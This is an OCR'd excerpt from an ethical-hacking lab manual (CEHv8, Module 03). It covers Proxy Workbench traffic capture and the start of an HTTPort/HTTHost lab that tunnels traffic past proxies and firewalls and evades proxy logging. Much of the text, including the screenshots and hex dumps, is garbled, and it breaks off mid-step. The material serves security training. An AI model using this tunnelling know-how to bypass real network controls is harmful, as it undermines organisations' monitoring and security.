•'f J 10011)**a « 0526 IK K052CTO 2110 >•‫•*»*►•*)«׳‬
1J -‫נ‬ 14441400 tiiir, :1 iw. «®27ug IV*
socket *J ‫י־‬ *0 0 )•CM (6 0526 734 06052706 3(95
u
il .‫«־‬
:‫«־‬
14441«cm n n :1 19, Krez'S)
acr.rte
IV J
3J41
1404 HCW
co n n e ctio n .I• •41 1400 )■IB »0$27»‫נ‬ ; v W>
06 052:7 »».< * < * 1 1 9 9 . *‫״‬
>1 . ‫נ‬ 144a IK M (*0127 104 H B700 in
h is to ry and save it >1 ‫י‬ 1400 )•CM »0J2n01 »05;‫יי»י‬ h■■<»(a‫•״‬a
‫׳‬ 1»1
144a m e 14,0127 ;71 06»27»
11 :‫נ־‬ 1444 ItOM m< k 27 411 0e « 2? 5ae
to HTML 11•■‫י‬ 140a1«:w (6 052743( 06052»»l •‫»►••י‬.-*)«‫•׳‬-«
U .‫נ‬ 144 a 1t a t C60127M• PAthtf<ka»Mcc
.*1 • 1000)acta
1444 laQHl
(6 0527 597
(6052702
06052*173
s au szs
FV»9hn<*co<na<t
144a 14CM £05£‫ נ‬7‫ ט‬3 t£S IS :4?
lOOQlKW 0605275S7 06052• 3‫ י‬5 CV*3hM41«x>«dt 1120
2—1 1T\
«0M4S 1 •0 17 34 a n 31 20 10 30
SotExterna0M&4 78 26 6345
70
CSC[ 10
«::>*€ 4‫ י‬a ir u . - u
10)1112 1 1
S . . : : i l 00 52 4d
39
£1
30
72
47
20
u
32 30 31
4; 41 0•
31 ro 0‫נ‬
4c (1 7 i
20«(
Sf <4
*>: w0 ct «t i r2*t 1‫ י‬F .'r0i . 1023>04
3C]‫׳‬141 >3 n :*dta-Caat
66
74
47
6‫י‬
20
IJ
65
32
64
64
30
38 20 >>
10
Qo 13 tl 04
?0
?2 W 2c
32
(3
3d
U
3»
K
30 I I
000160 o: .ji-age >: 3«0 tl Ic 3a d 61 7a« 20 3d 41 »7
000174 Od 0. 43 ?.( b I «m Cm (3 74 (1
«t0‫׳‬1? 2 45 0‫ ל‬M 4c 61 6‫ י‬7* 45 M H

F IG U R E 13.11: P ro x y W o ik b e n c h G e n e ra te d T ra ffic in W in d o w s S e rv e r 2012 H o s t M a c h in e

2 4 . N o w lo g in in to W indow s Server 2008 V i r t u a l M a c h i n e , a n d c h e c k d ie To

c o l u m n ; i t is f o r w a r d i n g d i e t r a f f i c t o 10.0.0.7 ( W i n d o w s 7 V i r t u a l
M a c h in e ) .

Fife View Tod* Hrip

M irilcrrfj ‫ וי•׳‬hin i'iii/'l 3 |10 0 0 3| !'*!41. 1 1

‫■ ׳‬IT IF* F' t »v •W<*b(>]CH])
$ AMr/M|y fm■ 1 su w 11‫ *!י׳‬f .•1‫״‬i K
^ ,iM T P •Outguny ••fr«l(25| ^d¥)006«ff)ft 1000701CO HTTP 061B33 750 0T) tB 40 !00 F
POP3 0n»iir1C1
•lr«Mfiin3 £J10.00.6»10 1a0.a?;8D80 H IIP 06.05 40109 06tt»41156 K
Qwpnmamm
■H1QOQ2I01QQQ7
jtJ':a:fc3 114 lQ0D7-mm HUP Q 3 40 !0‫<־‬ ‫׳‬BU.
9 (h 41 070 F
£ J'].0 0.6 9015 1aoa7.83E0 HTTP 06.(E « 375 03 00.41.625 F
& mo 0.6 to 10 0.0 7 £ J 6 ; 0 : ‫־‬snt ‫ ו‬00 07:‫שנט‬ HITP (£06 41437 0,0141 ms F
HT1P5Ro«v-SeojicWeb(4431 £J10 0 06 9819 1Q007:83EO HTTP 0606 *3 531 05 05 41 281 F
|21
" W FrP-Fielienifei Ftolord 1•Nol Lit*
£ h !0 a.6 9820 1ao.a?;83a1 HUP 06.05 « 546 06.0541.281 F
PdssThioj^i F01 Tastro^o*nOOOl fJ
jh J'I 0 0.&9B22 1aoa7!ffiEa HUP 05<E 40 578 (E05 40Bt3 F
£1100169824 1a0.a7:83EO HTTP 06:0=4:655 06 05:41.828 F
£110 00 69826 1Q0a7:fflffl HTTP 06 05*3 906 (K OS41 593 F
£ 7 A n d n o w , P ro x y £1100069828 1000.7:8303 HTTP 06<e 41015 0605 41 406 F
£1*100.6 9830 1a0.Q7.83EO HTTP 06.0C41 *09 06 05 41 718 F
W o r k b e n c h in c lu d e s £110 0 0&9H32 mon7rmgo H1IP (KtR 41 TIB as 05 41 ^11 Fj
d
c o n n e c tio n fa ilu re *1 1 2J
s im u la tio n stra te g ie s. W h a t fted cMsFoiHrTPPiceay•V/H3|B0B]| a
th is m e a n s is th a t y o u c a n :1:064 SxpiroD Sot 2 6 76 70 69 72 65 73 3a 20 S3 i l 74 ? ‫פ‬
010080 IUr 2011 00 G2 4d 61 72 20 32 30 31 31 20 30 30 3a
sim u la te a p o o r n e tw o rk , a ‫ ־ ־ ־‬09* <0 CUT hint. Nrd 39 20 47 Id S4 0d 04 ic 61 73 74 .?rf
060112 11 t.wd. f t 1 . 23 0 66 69 6S 64 20 16 7 2 b'3 2c 20 32
s lo w In te r n e t o r 00012C c t 2009 20•10 04 74 20 32 30 30 39 20 32 30 3.‫ י‬31 30
060144 GMT. . C»cho-Cont 47 4d JJ G« <3 61 63 b0 65 2d ■43
u n re s p o n s iv e se rv e r. T h is 060160 roL max-oge-360 6t 6c 30 20 fd 61 78 2d 61 6? 65 3d
060176 0. Connect io a k Od 0 9 43 61 6« 60 65 63 74 t ')
bl 6•
is m a k e s it th e d e fin itiv e 080192 oe p - o livc 65 70 2d 61 (c 69 6‫ל‬ 65 Od 0o Od 0o
T C P a p p lic a tio n te s te r

Mar a y 3ES KBylei T» 1mnate 01( R cIlb c Qr 'h rb»f‫־‬ C m ^ !‫ ׳‬CK -oggrg 01( 613AM

J Start | Proxy Worfctxfyh 6:15 AM

A iL d

F IG U R E 1 3 .12 P ro x y W o rk b e n c h G e n e ra te d T ra ffic in W in d o w s S e rv e r 2003 V irtu a l M a c h in e

C E H Lab M anual Page 218 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

2 5 . S e le c t O n d i e w e b s e r v e r , c o n n e c t t o p o rt 80 in W indow s 7 v ir t u a l m a c h in e ,

a n d c lic k OK
-TTTP Properties

General |

(• On the *tcb server, connect to port:

C " Connect vb atoihcr proxy

Pro<y :erver: 110.0.0.5

Port: [fiflffi

H I I t a llo w s y o u to 's e e '

h o w y o u r e m a il c lie n t
c o m m u n ic a te s w ith th e
e m a il s e rv e r, h o w w e b
p ag es a re d e liv e re d to y o u r
b ro w s e r a n d w h y y o u r F T P
c lie n t is n o t c o n n e c tin g to
its s e rv e r
OK il C«r>cd

F IG U R E 13.13: C o n fig u rin g H T T P p ro p e rtie s in W in d o w s 7

2 6 . N o w C h e c k d ie tr a f f ic i n 10.0.0.7 ( W in d o w s 7 V ir t u a l M a c h in e ) “ TO”
c o lu m n s h o w s t r a f f ic g e n e ra te d f i o m d ie d if f e r e n t w e b s ite s b r o w s e d i n

W indow s Server 2008

" Unix
p i? w a» '*wts c « > » w Wd iso

« >»: ® o 11 1► ;>
■
‫הו‬7‫צ&ו‬
r*e VWur Toeli Help

Q2 In the
n*Vlet»7naQa7} DcUI1 t a H T T P IW - W « b 180801
C onnectio n Tree, f t All«5ctr»*y 1 laslSUto
m il►
B/*5 C25 1 BylesS
I

From ­ ‫י‬: Pictocoi U sE ^ rl

^ SMTP •Ouiflonfl e ‫״‬id |25| ‫ד‬26E0 I1 :-.h<
if a p ro to c o l o r a K » ‫־‬C‫־‬C Ir«m^1*fflalf110l
*010.0 D32237
)0 1 0 0 0 32239
.‫ גן‬.*3
•571SS22G.aK:£0|adi
. HUP
HTTP
06:0634.627
0&£634643
06.05:35.436 FV»B ho? J'.ccrncc•...
0 £ < 6 2 « 3 fVt'B hai d : c f r r « l
1577
1555
0
0
)8100032239 ‫ * י‬7820612£»0 6 ‫»*<י‬ HTTP C6X634S66 06(636390 P*J»3 l « J i « r r « l . . . 1556 0
c lie n t/s e rv e r p a ir ‫ד‬ClClCl3to10005 ;0100032240 ‫ י‬9878206126* 0 * 0* » HTTP C6:(634$G6 06(635624 f*■‫ ?״‬hasdaxrrecJ... 1950 0
10003to 203.85.231.83 |m‫־‬j.Brc> )0 10 0 0 32241 1337320612!6c0|ic>*1t.. HTTP 06:C&34.336 060636624 FV>B bn d s O T iw l‫״‬ 1131 0
is se le cte d , th e ’00031# 6871 209176|abc goc
100031a 502706207|edn>m)k|
) 0 10 0 0 3 2242 2027921012140 (t * K 1 HTTP ££.0634 S£3 c e c & x 21e Km d : « r r « l 2110 0
100031a 58.27.86.123ledge Bus 50100032243 57‫ י‬iffi 2262(680|**» HTTP 06C636030 (6(636186 447S 0
D etails Pane 100031a 6871 220165|abc cm
)0 1 0 0 0 3 224( 56214311‫ מ‬lOtCImet71c . h i TP C6 (& .X. 2l£ 060&355W FWB hat d n c r m l . 2710 0
100031a 20279210 121 Ibi.ta* )0 10 0 0 3 2245 : 01106 9517&»<‫>ן‬4« » ‫ו‬ HTTP 0 fe » 354 » C M & X T tS ha* d if fr r w l 1572 112
d isp lays th e 10003b) 205 12884.126 )9100032246
)0 10 0 0 22 ‫נ‬c
‫ ־‬,‫־ ׳‬ ••-. 1 1 :-1 |. . :
'» ra 2 D 5 1 2 e w 0 a * u
HI TP
HI IP
06:0636483 (6 (C!36 (66
(*(CJ&124
‫ויי‬
11«
0
0
100031a 502786 105|f«*\1ur 06C03CW3
100031a 5827.06.21; I1d1«u.«t> )610 0 0 3229 J0n>206120WI1«ht HUP 06.06 3U6U6 0606J6243 rv>V bm d iw riK l... IA » 0
sum m ary 100031a 157166255216Mdi c ) 0 10 0 0 3 224) HTTP flf.r»3570? ff .f fT V W * ® K » d n (rr « 1 2‫ ט‬3 0
100031a 157 16625531 |r«iv, ',W10 0 0 3 2250 1«7820612S8000<ht HUP t e a . 56 786 . • > 1183 0
in fo rm a tio n o f all 100031s 20385211 148lilt ) 0 10 0 0 32251 h i IP 060U363W COOUJCW 1 8 ‫ ״י‬h o d im r M l. 2i03 0
100031a 2031068551 |bkcmc ) 0 1 OOO 322C •‫קי‬ ‫ ן‬ftfC|v».»w HTTP C fr» X C 7 ? M hoi d iM r m i ., MS 0
o f th e s o c k e t 100031a 502706225|s etrrcd
100031a 157.166.226.26Iwmc
‫־‬M 1000 32253 828 >18 1 -Sani2 a h b j HTTP C6:0636124 06(636718 ^ I « n l 1a r r « l... 3333 0
)0100032254 '»ra20612t<«)BCTht HI TP C6:Cfc36.166 0606367*9 ‫ *יי‬8 2125 358
100031a 1999362 126
c o n n e c tio n s th a t 100031a 203.106.85.65 |1pe.<Mr
) 0 10 0 0 32255
)01OOO322S
•3873206126t01icdn..
397920G1;&£C|1‫«־‬fce
HI TP
HTTP
06:0636216
C£C&36‫־‬££
060636611 FVrtJ he! diccrriKl..
0&0K36&2? PV.9‫־‬hatiic e r r c c t..
2(21
1124
0
0
1000310 20746148 32!view* )0 10 0 0 32257 HTTP t te d 2« r r« * ... 1120 0
a re in progress fo r 100031a 6623513059Ix-ffccm
)010.0.0.32258
‫־‬i»78206l260Hiceht
157.1652262660) l«fc HTTP
C6C636366
06.C&36.606
06(6368(6
060637.436 FVjB h s d.ccrrecl... 1533 0
100Q3la 203.106.85.177Ib.scae
th e se le c te d ite m 100031a 026207126ledn vrtt
100031a 15716622632|tve±a p e al line dsis is• HTTP P * • / ■Web (9060)
100031a 58272272|r.«*\tum
on th e C onnection 100031a 19070206 126|icchk 000160 61 72 75 3a 20 41 63 63 6 5 ? 0 7 4 2 d 4 61 3 6 ‫ ־ ג‬.‫־‬
000176 64 69 60 6 P Od 0a 60 33 SO 3a 2043 50 3d 22 40
100031a 157 166226.46ledlnr^ 000192 4f i l 20 id 4? 56 61 20 if ?5 S220 42 5? 53 20
Tree. 100031a 6623514224|rrel1b)< 000206 Wi 30(« 5et. 55 4e 4? 22 Od 0» 44 61 74 65 3•20 53 (1 74 2c
100031a 203 10605 176Idi Mrw 000224 26 bar 2011 00 20 32 36 20 4d 61 ?2 20 32 30 3131 20 30 30 3a
1000311 157.166.255.13Immma 000240 ?2 31 CUT Conn* 3S 32 3a 33 31 20 47 4tJ ?4 011 0a4 ) ii 6e (e 65
000256 ct*oc .iv s * . Co 61 6 ? 6 ( 6■ 6) &c Cl ?3 65 CJ 0■ 43 il

_L*a
74 3• 20
100031a 6871 209173 |4bc fl0< 000272 Btwt-Uimh 20 60 ?4 656a ?4 2d 4c 65 t>0 67 30 32 20 *3 68 4‫ל‬
ISL
F IG U R E 13.14: P r o s y W o rk b e n c h G e n e ra te d T ra ffic in W in d o w s 7 V ir tu a l M a c h in e

L a b A n a ly s is

D o c u m e n t a ll d ie IP addresses, open p o rts and running a p p lica tio n s, and

p r o t o c o l s y o u d i s c o v e r e d d u r i n g d i e la b .

C E H Lab M anual Page 219 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

T o o l/U tility In fo r m a tio n C o lle c t e d / O b je c t iv e s A c h ie v e d

P r o x y s e r v e r U s e d : 1 0 .0 .0 .7

P o rt s c a n n e d : 8080
P ro x y W o rk b e n c h

R e s u lt: T r a f f ic c a p tu re d b y w in d o w s 7 v ir t u a l

m a c h in e ( 1 0 .0 .0 .7 )

P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S L A B .

Q u e s t io n s

1. E x a m in e t h e C o n n e c t io n F a i lm e - T e r m i n a t io n a n d R e fu s a l.

2. E v a lu a te h o w r e a l- tim e lo g g in g r e c o r d s e v e r y t h in g i n P r o x y W o r k b e n c h .

In t e r n e t C o n n e c tio n R e q u ir e d

0 Y es □ N o

P la tfo r m S u p p o rte d

0 C la s s r o o m □ iL a b s

C E H Lab M anual Page 220 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
AB Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

HTTP T unneling U sing H TTPort

H T T P o / f is a program f r o m H T T H o s f that mates a transparent tunnel through a
p m x j server orf/renall

I CON KEY L a b S c e n a r io

V a lu a b le A tta c k e rs a r e a lw a y s i n a h u n t f o r c lie n ts t h a t c a n b e e a s ily c o m p r o m i s e d and

in fo r m a tio n th e y c a n e n te r th e s e n e tw o rk s w it h IP s p o o fin g to dam age o r s te a l d a ta . T h e

a tta c k e r can get p a c k e ts th ro u g h a fir e w a ll by s p o o fin g d ie IP a d d re s s . If

Test vour
k n o w le d g e a t t a c k e r s a r e a b le to c a p tu r e n e t w o r k t r a f f ic , as y o u h a v e le a r n e d to d o in th e

p r e v io u s la b , th e y can p e rfo rm T r o ja n a tta c k s , r e g is tr y a tta c k s , p a s s w o rd

3 W e b e x e r c is e
h ija c k in g a tta c k s , e tc ., w h ic h can p ro v e to be d is a s t r o u s fo r an o r g a n iz a tio n ’s

Q W o r k b o o k r e v ie w n e tw o rk . A n a tta c k e r m a y u s e a n e tw o r k p r o b e t o c a p tu r e r a w p a c k e t d a ta a n d

th e n u s e th is r a w p a c k e t d a ta t o r e tr ie v e p a c k e t i n f o r m a t io n s u c h as s o u rc e a n d

d e s tin a tio n IP a d d re s s , s o u rc e and d e s tin a tio n p o rts , fla g s , header le n g th ,

c h e c k s u m , T im e t o L iv e ( T I L ) , a n d p r o t o c o l ty p e .

T h e r e f o r e , a s a n e t w o r k a d m i n i s t r a t o r y o u s h o u l d b e a b le t o i d e n t i f y a t t a c k s b y

e x tr a c tin g in f o r m a t io n fro m c a p tu re d tr a ffic s u c h as s o u rc e a n d d e s tin a tio n I P

a d d re s s e s , p r o t o c o l ty p e , h e a d e r le n g th , s o u rc e a n d d e s tin a tio n p o r t s , e tc . a n d

c o m p a r e th e s e d e ta ils w i t h m o d e le d a t t a c k s ig n a tu r e s t o d e te r m in e i f a n a tta c k

h a s o c c u r r e d . Y o u c a n a ls o c h e c k t h e a t t a c k lo g s f o r t h e l i s t o f a t t a c k s a n d ta k e

e v a s iv e a c t io n s .

A ls o , y o u s h o u ld b e f a m ilia r w i t h th e H T T P t u n n e lin g te c h n iq u e b y w h ic h y o u

can id e n tify a d d itio n a l s e c u r ity r is k s th a t m ay n o t be r e a d ily v is ib le by

c o n d u c t in g s im p le n e t w o r k a n d v u ln e r a b ilit y s c a n n in g a n d d e t e r m in e th e e x t e n t

to w h ic h a n e tw o r k ID S c a n i d e n t i f y m a lic io u s t r a f f i c w i t h i n a c o m m u n ic a t io n

c h a n n e l . 111 t h i s l a b y o u w i l l l e a r n H T T P T u n n e lin g u s in g H T T P o r t .

L a b O b je c t iv e s

T h is la b w i l l s h o w y o u h o w n e tw o rk s c a n b e s c a n n e d a n d h o w to use H T T P ort
and H T T H o st

L a b E n v ir o n m e n t

111d i e la b , v o u n e e d d ie H T T P o r t to o l.

C E H Lab M anual Page 221 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

■ H T T P o r t i s lo c a t e d a tD:\CEH-Tools\CEHv8 M odule 03 S canning

N e tw o rk s \T u n n e lin g T o o ls\H T T P o rt

■ Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f H T T P o rt fro m d ie lin k

h t t p : / / w w w .t a 1 g e t e d . o r g /

■ I f y o u d e c id e t o d o w n l o a d t h e la t e s t v e r s io n , t h e n s c r e e n s h o t s s h o w n i n

£ " Tools th e la b m i g h t d i f f e r

d em o nstrate d in
■ I n s t a ll H T T H o s t o n W in d o w s S erver 2008 V ir t u a l M a c h in e
th is lab are
ava ila b le in ■ I n s t a ll H T T P o r t o il W in d o w s S e rve r 2 0 1 2 H o s t M a c h in e
D:\CEH-
■ F o l lo w t h e w iz a r d - d r iv e n in s t a lla t io n s te p s a n d in s ta ll it.
Tools\CEHv8
M odule 03 ■ A d m in is tra tiv e p riv ile g e s is r e q u i r e d t o r u n d i i s t o o l
Scanning
N e tw o rks ■ T h is la b m ig h t n o t w o r k i f r e m o te s e r v e r f ilt e r s / b lo c k s H T T P tu n n e lin g

p a c k e ts

L a b D u r a t io n

T im e : 2 0 M in u te s

O verview o f H TTPort
HTTPort c re a te s a t r a n s p a r e n t t u n n e lin g t u n n e l d ir o u g h a p r o x y s e r v e r o r fir e w a ll.

H T T P o r t a llo w s u s in g a ll s o r ts o f I n t e r n e t S o f t w a r e f r o m b e h i n d d ie p r o x y . I t
bypasses HTTP p ro xie s and HTTP, fire w a lls , and tra n sp a re n t a ccelerators.

L a b T a s k s
Stopping IIS B e fo r e r u n n in g d ie t o o l y o u n e e d t o s to p IIS A dm in S ervice and World
S ervices W ide W eb Publishing se rvices on W indow s S erver 2008 v irtu a l m achine.

2. G o to A d m in is tra tiv e P rivileges S ervices IIS Adm in Service, r ig h t

c lic k a n d c lic k th e Stop o p tio n .

01 HTTPort
cre a te s a
tra n sp a re n t
tu nn el th ro ug h a
proxy se rve r or
fire w a ll. T his
a llo w s you to use
a ll so rts o f
In te rn e t s o ftw a re
fro m behind th e
proxy.

C E H Lab M anual Page 222 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

IIS Admin Scrvict Ka-n- * I CeKri3bcn | 5:afc_s

'*,FurcBon Discovery Provide Host hostcroca.. , Stated
Sioo th- service P-rcoco Decovery Resource PJ>lc3ten P-behes t... Started
5.estart thesevce
■C^C-rOvOPoicy Cent The serve... Started
Key aid Cerbfeate Mens9»trp-t P-o-rde*X...
Docrpton: £,h\jma1 :rtc'frc• Devi:• Access E'aolas 9a
Enabltc 6‫ י‬11 « ‫ « > ־‬to * d 1‫־‬n v j ! t ‫ •־‬::s P0‫־‬vd81 a .. . started
CfchyMr-v m u txchanoa s w a
‫ » ׳ ׳‬: « * « ‫ «יי־‬H5 ‫׳‬X 'J tK C
»r*ou‫׳‬M10n *or ‫ «ימ‬SK*® one FTP <|1Hyoer-VGue»t Shutdown Se‫׳‬v»oe fvovdes a .. . Started
1*rvior* thumvte•ttauprd. :‫»־‬ <£^Hyp*r«VUtatoeat Stive* Va-iton th... 5hr ted
2 16 -—
3
i « ‫׳‬v«' n il * u « * to am f g.«« S
or ftp. :, the servce e c jx c «. an,
'^,hvsf'-v Tir* Syndvonuaton Save• Syrdvcnj . SUr'tid
se1/‫׳׳‬ee* *v9!t»porv dfpeo; o• *mI ‫•'־׳‬X‫ « ׳‬V0iuneSh«30WC00VR«UMCDr cocfdnjte _ 1urted ‘
fa I tottait.
S tJt________
£.32 a‫־־‬d Au0!:p tPMC *CeyUg ModJet St* lid
CfeInteractive services Detection
P.-llv
4 Internet Cornecton Shwrng CCS) jn...
IP helper Res-re Started
R«3rt ! * "
£,IPsec PoIcy Agent . 5:cited
:£JkctR.t1* v ‫<־‬£trbuted Transaction Coordnsso‫־‬ AITmks ►3te , Started
^Irtt-tover To»og>•Discovery1“tepee- -- ‫ ־‬0 ...
?iwicroajft KETFrans0‫ ״‬rk NGB<v3 0.50727_kfr■ Started
;*Microsoft .rcrFraroenorkNGei v: 0.50727_>« Proprf br% t .... Stated
'■*, M0090* Fb‫־׳‬e Channel ^stfo'Ti Res^Cstcn Se* 8‫ ־‬t..
^ MCT0 M*t 6 CSI ]ntigtor Service wb ,‫ן‬
^Vbon*! Software Shacton Copy P'ordfi W ragn «...
Q,MoJU Manteimce Save• Th*M00IU..
_J

‫ץ‬ Stana*.- J ~
>t:p jcrvce IL Acrrr StrVtt on LOCOCaiOutt*

F IG U R E 14.1: S to p p in g I I S A d m in S e rv ic e in W in d o w s S e rv e r 2008

3. G o to A d m in is tra tiv e P rivileges S ervices W orld W ide Web

Publishing Services, r ig h t - c lic k a n d c lic k d ie Stop o p tio n .

& It bypasses
*te Action jjen Kels
HTTPS and HTTP E f IB
N^ltwl ‫ רי‬Ab- [ >rrf | E
proxies, Servwj ClomJ) I S « v « « (lo ca l)

tra n sp a re n t v;‫ ״‬tid Wide Web PwbW-mg SrrvK .1 ‫־‬ 1CwJOCor I S !a w j

P1cr>*0M ‫זו‬...

a c c e le ra to rs , and 2 8
‫ י צ‬n e servce
Rf*t»r; ‫ «י‬t t ' t e
'1
SfcvOU S’ Mijs. Coov MWU0K*...
CfetYea Mar^aoerent S e ‫<׳־‬ce TUtWtbM..

fire w a lls . It has a 1 >/.9

% Vrd AudO Mo'eOcS a...

11 1
C«so aion:
(V» ‫׳‬d f Web a n ‫־‬w r< r r end
0
^ «v‫׳‬xto/.9 Aucto ErekJrtit s J s e
1
Ha'sOeid...
‫־‬he W a P l..
b u ilt-in SOCKS4 » ‫דדלמי׳ו־כ‬: ‫ ח‬rr y .y ■ f c :‫ ־‬rr‫ ״‬r
lnforrr~-.cn 5e r a * ‫ ־‬Hjrage-
^ Y ‫<־־‬to/.S Cotor SySteri
0
£ (M fld M Dectoymeot Sevces Serve Ha-aoesr...
^ M m s Driver Fourdaoon -Lee ‫״‬cce Diver “ ‫ ׳ * ־‬xr- Ha‫־׳‬aoe; u...
server. 1‫■״‬ 3 0 8
‫־‬.. «Y‫־־‬d ‫׳‬/.s & ‫ ׳ ׳‬Repo ‫ יט ׳‬Semoe 1
Ab ‫־‬.-sero... Ste tec
»/.9
i^ %Yrd ? ‫׳‬e i: Cotecto Thssevfc...
% \V'tkr/.$ ®‫׳‬e it uw Thssevfc... Stated
^!Y rd o/.s F»e.\dl ViW owsF.. . Stated
$*Yrd>/.e CngUi/ler I aat Adds, mod■.‫״‬
CJt«Yrtto/.9 1 1 ‫ו׳‬5«‫קמי׳י׳«יו״‬ ftovd » a ... Stated
«v‫־׳‬d0/9 ModJes trwtalei & » a b « n s... Stated
C i« v‫׳‬xto/.® BioceM Activation Seivd I ^ r ‫•יזל‬ Undo... Stated
30
^ ■V'cto/n 5«mote M ‫׳‬V e‫*«״‬nt M Re*»t V J« o ‫» ״‬B... Stated
try M ints‫ *׳‬S.. . stated
a it m *■ »
^ %Y‫׳‬Yfew,« uoflat* stated
^ * v r H n p webP'oxvAuto-oaeovJ KrHTTPl...
^ . v ‫<»׳‬-Autocar *c ^***TMC...
Perfcrwsrce Aflao*‫׳‬
H n y r B fi
060
Pre‫* ^־‬ ‫״‬
•\'08>'‫׳‬taecr bet) Stated
JE 3 S JB

\ £ x a r d e ; A Sarri8•: /
£‫־‬:c -T ‫;'׳‬g .‫'־‬,o'c y-1:c • ■er: -vb1?‫־‬n; ' r ‫׳‬c t.:• r: ; 0 ‫־־‬0 ^ ‫־‬

F IG U R E 1 4 2 : S to p p in g W o r ld W id e W e b S e rv ic e s in W in d o w s S e rv e r 2008

‫ ט‬It supp orts 4. “ CEH-Tools" Z:\CEHv8 M odule 03

O p e n M a p p e d N e tw o r k D r iv e

stro n g tra ffic Scanning N etw orks\T unneling Tools\H TTH ost
e n cryp tio n , w h ic h 5. O pen H TTHost fo ld e r a n d d o u b le c lic k htthost.exe .
m akes proxy
logging useless, 6. T lie H TTH ost w i z a r d w i l l o p e n ; s e le c t d i e O ptions ta b .

and suppo rts

7. O n d ie O ptions t a b , s e t a l l d i e s e t t in g s t o d e f a u l t e x c e p t Personal
NTLM and o th e r
Passw ord fie ld , w h i c h s h o u l d b e f i l l e d i n w i t h a n y o t h e r p a s s w o r d . 111 d i i s
a u th e n tic a tio n
la b , d ie p e r s o n a l p a s s w o r d is km a g ic.'?
schem es.

C E H Lab M anual Page 223 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

8. C h e c k d ie R evalidate DNS nam es and Log C onnections o p t io n s a n d c lic k

A pply

HTTHost 1.8.5

N etw ork
B ind lis te n in g to : P o rt: B ind e x t e r n a l to :
|0.0.0.0 [80 10.0.0.0
Allow a c c e s s fr o m : P e r s o n a l p a s s w o rd :
10.0.0.0

[‫־‬ P a s s th r o u g h u n r e c o g n iz e d r e q u e s t s to :
H o s t n a m e o r IP : P o rt: O rig in a l IP h e a d e r fie ld :
1127.0.0.1 |81 | x ‫ ־‬O rig in a l‫ ־‬IP

& To s e t up M ax. local b u ffe r: T im e o u ts :

H TTPort need to ‫־‬3 |0=1‫־‬2
p o in t yo u r
R e v a lid a te DNS n a m e s
b ro w s e r to
Log c o n n e c tio n s ‫־‬ Apply
127.0.0.1

S ta tis tic s ] A p p lic a tio n log | ^ 3 p tio n s jj" S e c u r'ty | S e n d a G ift)

F IG U R E 14.3: H T T H o s t O p tio n s tab

9. N o w le a v e HTTHost in ta c t, a n d d o n ’t t u r n o f f W indow s S erver 2008

V i r t u a l M a c h in e .

10. N o w s w itc h to W indow s Server 2012 H ost M achine, a n d in s t a ll H T T P o r t

fio m D:\CEH-Tools\CEHv8 M odule 03 Scanning N etw orks\Tunneling

Tools\H TTPort a n d d o u b le - c lic k h ttp o rt3 sn fm .e xe
& H TTPort goes 1 1 . F o llo w d ie w iz a r d - d r iv e n in s ta lla tio n steps.
w ith th e
predefined 1 2 . L a u n c h th e S ta rt m e n u b y h o v e r in g d ie m o u s e c u r s o r i n th e lo w e r - le f t

m apping c o r n e r o f th e d e s k to p .

"E x te rn a l HTTP
p ro xy‫ ״‬o f local
po rt

F IG U R E 14.4: W in d o w s S e rv e r 2012 - D e s k to p ^ ie w

1 3 . C lic k d ie HTTPort 3.SNFM a p p t o o p e n d ie HTTPort 3.SNFM w in d o w .

C E H Lab M anual Page 224 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

5 t3 ft Administrator

Server Windows Google Hyper-V HTTPort

Manager PowerShell Chrome Manager 3.SNPM

i. m » 91 1
T ools
Con>puter Control Wyper-V SOI Server
d e m on stra te d in Panel Virtual incaknor
Machine... Cent•!.‫״‬
th is lab are
*‫נ‬ V n
a va ila b le in
Command M021IU
D:\CEH- Prompt Firefox Nctwodc
£
Tools\CEHv8 ■
“ ‫יי ■ ״ ״‬-
F‫־־־‬ © if
M odule 03 Proxy MegaPng
Workbea.
Scanning
N e tw o rks -T *8

F IG U R E 14.5: W in d o w s S e rv e r 2012 - A p p s

14. T h e HTTPort 3.SNFM w in d o w a p p e a rs as s h o w n i n d ie fig u r e d ia t f o llo w s .

HTTPort 3.SNFM '‫ ־‬r°

S y s te m j Proxy :j por^ m a p p in g | A bout | R e g iste r |

HTTP proxy to b y p a s s (b la n k = dire c t o r firewall)

H ost n a m e o r IP a d d r e s s : Port:

F o r e a c h s o ftw a re to
c re a te c u s to m , g iv e n a ll th e
Proxy re q u ire s a u th e n tic a tio n
a d d re sse s fro m w h ic h it U se rn a m e : P assw ord!
o p e ra te s . F o r a p p lic a tio n s
th a t a re d y n a m ic a lly
c h a n g in g th e p o rts th e re
Misc. o p tio n s
S o c k s 4 - p ro x y m o d e , in
w h ic h th e s o ftw a re w ill U ser-A gent: B ypass m o d e :
c re a te a lo c a l s e rv e r S o c k s IE 6 .0
(1 2 7 .0 .0 .1 )

U se p e rs o n a l re m o te h o s t a t (b la n k = u s e public)

H ost n a m e o r IP a d d r e s s : Port: P assw ord:

I------------------------------ P I--------------

? \ 4 — This b u tto n h elp s S tart

F IG U R E 14.6: H T T P o r t M a in W in d o w

1 5 . S e le c t d i e Proxy ta b a n d e n te r d ie h ost nam e or IP address o f ta rg e te d

m a c h in e .

1 6 . H e r e as a n e x a m p le : e n t e r W indow s Server 2008 v ir t u a l m a c h in e IP

